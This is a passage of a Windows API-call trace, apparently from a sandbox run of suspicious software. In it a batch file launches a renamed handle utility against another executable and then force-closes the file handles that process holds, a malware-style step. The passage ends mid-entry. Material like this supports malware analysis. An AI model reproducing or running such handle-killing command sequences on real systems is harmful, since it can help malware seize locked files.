(_FileHandle=1) returned 0x7 [0162.750] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2cf020, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf020*=0x3) returned 1 [0163.221] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x2cf034 | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0163.221] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.221] GetFileType (hFile=0x7) returned 0x2 [0163.221] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.221] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceff4 | out: lpMode=0x2ceff4) returned 1 [0163.222] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.222] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x2cf020, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf020*=0x20) returned 1 [0163.222] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x2cf034 | out: _Buffer=" %I IN ") returned 7 [0163.222] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.222] GetFileType (hFile=0x7) returned 0x2 [0163.223] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.223] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceff4 | out: lpMode=0x2ceff4) returned 1 [0163.223] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.223] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x2cf020, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf020*=0x7) returned 1 [0163.225] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x2cf030 | out: _Buffer="(`tdq963ii.exe -accepteula \"executed_florists.exe\" -nobanner`) DO ") returned 66 [0163.225] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.225] GetFileType (hFile=0x7) returned 0x2 [0163.226] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.226] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceff0 | out: lpMode=0x2ceff0) returned 1 [0163.226] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.226] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x42, lpNumberOfCharsWritten=0x2cf01c, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf01c*=0x42) returned 1 [0163.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.227] GetFileType (hFile=0x7) returned 0x2 [0163.227] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.228] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceffc | out: lpMode=0x2ceffc) returned 1 [0163.228] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.228] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x2cf028, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x2cf028*=0x1) returned 1 [0163.229] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.229] GetFileType (hFile=0x7) returned 0x2 [0163.229] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.229] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cefe0 | out: lpMode=0x2cefe0) returned 1 [0163.230] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.230] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x2ff4d0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x2cf00c, lpReserved=0x0 | out: lpBuffer=0x2ff4d0*, lpNumberOfCharsWritten=0x2cf00c*=0xc) returned 1 [0163.232] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2cf018 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0163.232] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.232] GetFileType (hFile=0x7) returned 0x2 [0163.232] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.232] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cefd8 | out: lpMode=0x2cefd8) returned 1 [0163.233] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.233] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2cf004, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf004*=0x26) returned 1 [0163.234] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2cf034 | out: _Buffer=") ") returned 2 [0163.234] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.234] GetFileType (hFile=0x7) returned 0x2 [0163.234] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.234] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceff4 | out: lpMode=0x2ceff4) returned 1 [0163.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.235] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf020, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf020*=0x2) returned 1 [0163.236] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf054 | out: _Buffer="\r\n") returned 2 [0163.236] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.236] GetFileType (hFile=0x7) returned 0x2 [0163.237] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.237] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf014 | out: lpMode=0x2cf014) returned 1 [0163.237] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.237] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf040, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf040*=0x2) returned 1 [0163.239] GetProcessHeap () returned 0x2f0000 [0163.239] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2c) returned 0x2f1290 [0163.239] GetProcessHeap () returned 0x2f0000 [0163.240] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xc) returned 0x2f0db8 [0163.240] GetProcessHeap () returned 0x2f0000 [0163.240] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xc) returned 0x2f0dd0 [0163.240] GetProcessHeap () returned 0x2f0000 [0163.240] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe) returned 0x2f0de8 [0163.240] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0163.240] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0163.240] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0163.240] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0163.240] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0163.241] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0163.241] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0163.241] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x2cef70, _Radix=0 | out: _EndPtr=0x2cef70*=",6 delims=: \"") returned 3 [0163.241] wcstol (in: _String="6 delims=: \"", _EndPtr=0x2cef70, _Radix=0 | out: _EndPtr=0x2cef70*=" delims=: \"") returned 6 [0163.241] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0163.241] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0163.241] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0163.241] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0163.241] GetProcessHeap () returned 0x2f0000 [0163.241] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f0de8 | out: hHeap=0x2f0000) returned 1 [0163.241] GetProcessHeap () returned 0x2f0000 [0163.241] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe) returned 0x2f0de8 [0163.241] GetProcessHeap () returned 0x2f0000 [0163.241] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x2f0db8, Size=0xe) returned 0x2f0e00 [0163.242] GetProcessHeap () returned 0x2f0000 [0163.242] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f0e00) returned 0xe [0163.242] GetProcessHeap () returned 0x2f0000 [0163.242] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x2f0dd0, Size=0x14) returned 0x3043c8 [0163.242] GetProcessHeap () returned 0x2f0000 [0163.242] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3043c8) returned 0x14 [0163.242] _wpopen (_Command="tdq963ii.exe -accepteula \"executed_florists.exe\" -nobanner", _Mode="rb") returned 0x77032960 [0163.262] feof (_File=0x77032960) returned 0 [0163.262] ferror (_File=0x77032960) returned 0 [0163.262] GetProcessHeap () returned 0x2f0000 [0163.262] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x108) returned 0x3043e8 [0163.262] fgets (in: _Buf=0x3043f0, _MaxCount=256, _File=0x77032960 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77032960) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0178.170] feof (_File=0x77032960) returned 0 [0178.170] ferror (_File=0x77032960) returned 0 [0178.170] GetProcessHeap () returned 0x2f0000 [0178.170] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x3043e8, Size=0x208) returned 0x3043e8 [0178.170] GetProcessHeap () returned 0x2f0000 [0178.170] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3043e8) returned 0x208 [0178.170] fgets (in: _Buf=0x304436, _MaxCount=442, _File=0x77032960 | out: _Buf="\r\r\n", _File=0x77032960) returned="\r\r\n" [0178.170] feof (_File=0x77032960) returned 0 [0178.170] ferror (_File=0x77032960) returned 0 [0178.170] GetProcessHeap () returned 0x2f0000 [0178.170] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x3043e8, Size=0x308) returned 0x3043e8 [0178.170] GetProcessHeap () returned 0x2f0000 [0178.171] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3043e8) returned 0x308 [0178.171] fgets (in: _Buf=0x304439, _MaxCount=695, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0181.138] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 1 [0181.139] GetProcessHeap () returned 0x2f0000 [0181.139] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x3043e8, Size=0x9e) returned 0x3043e8 [0181.139] GetProcessHeap () returned 0x2f0000 [0181.139] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3043e8) returned 0x9e [0181.139] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x304439, cbMultiByte=73, lpWideCharStr=0x3043f0, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0181.140] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cec64 | out: _Buffer="\r\n") returned 2 [0181.140] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.140] GetFileType (hFile=0x7) returned 0x2 [0181.141] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0181.141] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cec24 | out: lpMode=0x2cec24) returned 1 [0181.141] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.141] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cec50, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cec50*=0x2) returned 1 [0181.143] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0181.143] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cec60 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0181.143] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cec60 | out: _Buffer=">") returned 1 [0181.143] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.144] GetFileType (hFile=0x7) returned 0x2 [0181.148] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0181.148] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cec28 | out: lpMode=0x2cec28) returned 1 [0181.149] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.149] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2cec54, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2cec54*=0x26) returned 1 [0181.149] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.149] GetFileType (hFile=0x7) returned 0x2 [0181.150] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0181.150] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceeac | out: lpMode=0x2ceeac) returned 1 [0181.150] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.150] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x2ceed8, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x2ceed8*=0x1) returned 1 [0181.150] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.150] GetFileType (hFile=0x7) returned 0x2 [0181.151] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0181.151] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cee90 | out: lpMode=0x2cee90) returned 1 [0181.151] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.151] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x314b10*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x2ceebc, lpReserved=0x0 | out: lpBuffer=0x314b10*, lpNumberOfCharsWritten=0x2ceebc*=0xc) returned 1 [0181.152] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2ceec8 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0181.152] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.152] GetFileType (hFile=0x7) returned 0x2 [0181.152] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0181.152] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cee88 | out: lpMode=0x2cee88) returned 1 [0181.153] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.153] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x2ceeb4, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ceeb4*=0x2c) returned 1 [0181.155] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2ceee4 | out: _Buffer=") ") returned 2 [0181.155] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.155] GetFileType (hFile=0x7) returned 0x2 [0181.155] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0181.155] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceea4 | out: lpMode=0x2ceea4) returned 1 [0181.156] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.156] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ceed0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ceed0*=0x2) returned 1 [0181.156] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cef04 | out: _Buffer="\r\n") returned 2 [0181.156] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.157] GetFileType (hFile=0x7) returned 0x2 [0181.157] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0181.157] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceec4 | out: lpMode=0x2ceec4) returned 1 [0181.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.158] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ceef0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ceef0*=0x2) returned 1 [0181.160] GetConsoleTitleW (in: lpConsoleTitle=0x2cea14, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.161] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x304738, lpFilePart=0x2ce534 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ce534*="Desktop") returned 0x25 [0181.161] SetErrorMode (uMode=0x0) returned 0x1 [0181.162] GetProcessHeap () returned 0x2f0000 [0181.162] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x304730, Size=0x6e) returned 0x304730 [0181.162] GetProcessHeap () returned 0x2f0000 [0181.162] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304730) returned 0x6e [0181.162] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0181.162] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0181.162] GetProcessHeap () returned 0x2f0000 [0181.162] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x120) returned 0x3047a8 [0181.162] GetProcessHeap () returned 0x2f0000 [0181.162] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x238) returned 0x3048d0 [0181.163] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0181.163] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x2ce2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce2d0) returned 0x304a80 [0181.163] FindClose (in: hFindFile=0x304a80 | out: hFindFile=0x304a80) returned 1 [0181.163] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0181.163] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0181.164] GetConsoleTitleW (in: lpConsoleTitle=0x2ce7a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.164] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ce630, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ce6f8 | out: lpAttributeList=0x2ce630, lpSize=0x2ce6f8) returned 1 [0181.164] UpdateProcThreadAttribute (in: lpAttributeList=0x2ce630, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ce6f0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ce630, lpPreviousValue=0x0) returned 1 [0181.164] GetStartupInfoW (in: lpStartupInfo=0x2ce5ec | out: lpStartupInfo=0x2ce5ec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0181.164] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0181.164] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2ce68c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ce6d8 | out: lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x2ce6d8*(hProcess=0x74, hThread=0x84, dwProcessId=0xb84, dwThreadId=0x620)) returned 1 [0181.185] CloseHandle (hObject=0x84) returned 1 [0181.185] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0181.185] GetProcessHeap () returned 0x2f0000 [0181.185] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3076d0 | out: hHeap=0x2f0000) returned 1 [0181.185] GetEnvironmentStringsW () returned 0x306b30* [0181.186] GetProcessHeap () returned 0x2f0000 [0181.186] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb92) returned 0x3076d0 [0181.186] FreeEnvironmentStringsW (penv=0x306b30) returned 1 [0181.186] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0188.866] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x2ce5cc | out: lpExitCode=0x2ce5cc*=0x1) returned 1 [0188.867] CloseHandle (hObject=0x74) returned 1 [0188.867] _vsnwprintf (in: _Buffer=0x2ce714, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ce5d8 | out: _Buffer="00000001") returned 8 [0188.867] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0188.867] GetProcessHeap () returned 0x2f0000 [0188.867] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3076d0 | out: hHeap=0x2f0000) returned 1 [0188.867] GetEnvironmentStringsW () returned 0x306b30* [0188.867] GetProcessHeap () returned 0x2f0000 [0188.868] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb92) returned 0x3076d0 [0188.868] FreeEnvironmentStringsW (penv=0x306b30) returned 1 [0188.868] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0188.868] GetProcessHeap () returned 0x2f0000 [0188.868] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3076d0 | out: hHeap=0x2f0000) returned 1 [0188.868] GetEnvironmentStringsW () returned 0x306b30* [0188.868] GetProcessHeap () returned 0x2f0000 [0188.868] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb92) returned 0x3076d0 [0188.868] FreeEnvironmentStringsW (penv=0x306b30) returned 1 [0188.868] GetProcessHeap () returned 0x2f0000 [0188.868] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f0dd0 | out: hHeap=0x2f0000) returned 1 [0188.868] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ce630 | out: lpAttributeList=0x2ce630) [0188.869] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.869] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0188.869] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.869] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0188.870] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.870] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0188.870] SetConsoleInputExeNameW () returned 0x1 [0188.870] GetConsoleOutputCP () returned 0x1b5 [0188.870] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0188.871] SetThreadUILanguage (LangId=0x0) returned 0x409 [0188.871] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ceffc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0188.872] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0188.872] _get_osfhandle (_FileHandle=3) returned 0x74 [0188.872] SetFilePointer (in: hFile=0x74, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0188.872] GetProcessHeap () returned 0x2f0000 [0188.872] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304a00 | out: hHeap=0x2f0000) returned 1 [0188.872] GetProcessHeap () returned 0x2f0000 [0188.872] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3048d0 | out: hHeap=0x2f0000) returned 1 [0188.872] GetProcessHeap () returned 0x2f0000 [0188.872] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3047a8 | out: hHeap=0x2f0000) returned 1 [0188.872] GetProcessHeap () returned 0x2f0000 [0188.872] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304730 | out: hHeap=0x2f0000) returned 1 [0188.872] GetProcessHeap () returned 0x2f0000 [0188.872] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3046a8 | out: hHeap=0x2f0000) returned 1 [0188.872] GetProcessHeap () returned 0x2f0000 [0188.872] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304490 | out: hHeap=0x2f0000) returned 1 [0188.872] GetProcessHeap () returned 0x2f0000 [0188.872] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x314b50 | out: hHeap=0x2f0000) returned 1 [0188.872] GetProcessHeap () returned 0x2f0000 [0188.873] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x314b08 | out: hHeap=0x2f0000) returned 1 [0188.873] GetProcessHeap () returned 0x2f0000 [0188.873] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f0de8 | out: hHeap=0x2f0000) returned 1 [0188.873] GetProcessHeap () returned 0x2f0000 [0188.873] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3043c8 | out: hHeap=0x2f0000) returned 1 [0188.873] GetProcessHeap () returned 0x2f0000 [0188.873] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f0e00 | out: hHeap=0x2f0000) returned 1 [0188.873] GetProcessHeap () returned 0x2f0000 [0188.873] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f1290 | out: hHeap=0x2f0000) returned 1 [0188.873] GetProcessHeap () returned 0x2f0000 [0188.873] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304368 | out: hHeap=0x2f0000) returned 1 [0188.873] GetProcessHeap () returned 0x2f0000 [0188.873] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2ff4c8 | out: hHeap=0x2f0000) returned 1 [0188.873] GetProcessHeap () returned 0x2f0000 [0188.873] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304308 | out: hHeap=0x2f0000) returned 1 [0188.873] GetProcessHeap () returned 0x2f0000 [0188.873] HeapFree (in: 